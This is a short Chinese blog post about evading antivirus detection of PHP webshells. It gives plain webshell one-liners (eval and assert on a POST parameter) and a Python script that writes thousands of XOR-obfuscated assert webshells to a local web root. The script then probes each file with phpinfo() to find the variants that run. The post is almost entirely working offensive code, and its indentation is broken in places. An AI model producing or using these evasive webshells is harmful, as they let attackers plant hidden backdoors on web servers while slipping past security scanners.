php异或免杀

import requests,base64,time,sys,threading,queue
#异或免杀
#<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?>
#<?php @eval($_POST['hacker']);?>
#!和@ 先各种转为ascll码,再各自转化为二进制,两者二进制异或结果,转化为ascll,最后转化为字符

#string 检测phpinfo是否执行成功
def string():
    while not q.empty():  # 判断q不为空
        filename=q.get()
        url = 'http://127.0.0.1:8080/x/' + filename
        datas = {
            'x': 'phpinfo();'
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        if 'bingtang-PC' in result:
                print('check->'+filename+'->ok')
            else:
                print('check->'+filename+'->no')
            time.sleep(1)

def shell_test_check():
    url='http://127.0.0.1:8080/x/33xd64.php'
    datas = {
        'x': 'phpinfo();'
    }
    result = requests.post(url, data=datas).content.decode('utf-8')
    print(result)
    if 'bingtang-PC' in result:
            print('ok')

if __name__=="__main__":
    q = queue.Queue()  # python queue模块的FIFO队列先进先出。
    for i in range(1,127):  #ASCLL从1到127
        for ii in range(1,127):
            payload = "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            with open('D:/phpstudy/WWW/x/' + filename, 'a') as f:
                f.write(code)
                f.close()
                print(filename + '文件生成成功')
    #多线程
    for x in range(10):
        t=threading.Thread(target=string)
        t.start()

 

posted @ 2021-08-13 18:45  bingtanghulu  阅读(210)  评论(0编辑  收藏  举报